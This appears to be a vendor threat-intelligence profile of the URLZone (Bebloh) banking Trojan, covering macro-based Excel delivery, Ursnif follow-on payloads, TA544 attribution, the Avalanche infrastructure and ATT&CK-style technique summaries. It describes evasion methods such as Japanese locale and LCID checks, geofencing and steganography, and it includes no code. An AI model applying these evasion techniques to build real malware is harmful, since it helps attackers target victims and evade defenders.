URLzone
URLZone, also known as Bebloh and Shiotob, is a banking Trojan first observed in 2009. The provided content describes it as an eBanking Trojan and links it to credential and financial-data theft typical of banking malware. It has been observed as both a hosted malware family and a botnet using Avalanche fast-flux communication infrastructure, and Avalanche-related investigations tied Bebloh/URLZone infections to German-speaking victims and shared command-and-control infrastructure.
In the campaigns described, URLZone was commonly delivered through malicious Microsoft Excel documents containing macros. When victims enabled macros, the documents downloaded URLZone as an initial payload; URLZone then downloaded and installed Ursnif, including Ursnif 1000 in Japan-focused activity. Delivery chains used multiple layers of obfuscation, geofencing, and locale checks to verify intended victims, especially in Japan. The content specifically notes checks for Japanese Excel country settings, Japanese-language PowerShell error text, Japanese year formatting, and LCID 1041. Some campaigns also used steganography, embedding malicious code in image data referenced by Office documents.
URLZone activity in the supplied reporting is strongly associated with financially motivated actor TA544. Proofpoint assessed TA544 as a high-volume distributor operating primarily in Japan and Italy, using localized invoice- or payment-themed phishing emails and malicious Office attachments. In 2019, URLZone was reported as the highest-volume email threat in Japan, where it appeared mainly as an initial payload leading to Ursnif infections configured with web injects for Japanese banks. TA544 also used geofencing and localized lures to target victims in Japan and Italy.
The malware is also repeatedly listed among families distributed or hosted via the Avalanche criminal infrastructure, alongside other banking trojans, ransomware, and botnets. Avalanche was used for phishing, malware distribution, and botnet communications, and supported URLZone/Bebloh among many other malware families. No standalone file hashes, domains, or IP indicators specific to URLZone are provided in the content.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Messages from these campaigns drop their payloads via Microsoft Excel documents with macros, that when enabled, download URLZone (another banking Trojan), which, in turn, download Ursnif 1000.
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
The criminal groups have been using the Avalanche infrastructure since 2009 for conducting malware, phishing and spam activities. They sent more than 1 million e-mails with damaging attachments or links every week to unsuspecting victims.
Execution
4 techniques
Execution
It may be delivered via password-protected Zip files; Microsoft Office document attachments with malicious macros; or compressed JScript, JavaScripts, or Visual Basic scripts.
Examples of recent language and locale checks include: PowerShell error for non-existent command contains "用語 " ... PowerShell cmdlet: 'Get-date' ... PowerShell cmdlet: 'Get-Culture."LCID"' needs to contain "04"
Stealth
3 techniques
Stealth
The macros also use multiple layers of obfuscation and various locale and language checks to ensure the victim machine is in Japan before downloading and decoding the initial payload.
Credential Access
2 techniques
Credential Access
Discovery
3 techniques
Discovery
Most Ursnif 1000 campaigns use a robust combination of geofencing techniques to verify that users are located in Japan.
Collection
1 technique
Collection
Command and Control
4 techniques
Command and Control
Sinkholing is an action whereby traffic between infected computers and a criminal infrastructure is redirected to servers controlled by law enforcement authorities... infected computers can no longer reach the criminal command and control computer systems and so criminals can no longer control the infected computers.
Avalanche used fast-flux DNS, a technique to hide the criminal servers, behind a constantly changing network of compromised systems acting as proxies.
Recent activity
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Banking trojan used by TA544 especially in Japan, commonly as an intermediate payload that downloads Ursnif 1000.
Banking trojan used heavily in Japan-targeted email campaigns. Delivered via malicious Excel macros, it performs locale/language checks to verify Japanese targets and then downloads Ursnif as a follow-on payload.
Payload dropped from malicious Excel documents as part of an infection chain that ultimately delivers Ursnif.
Banking trojan associated with Avalanche infrastructure.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.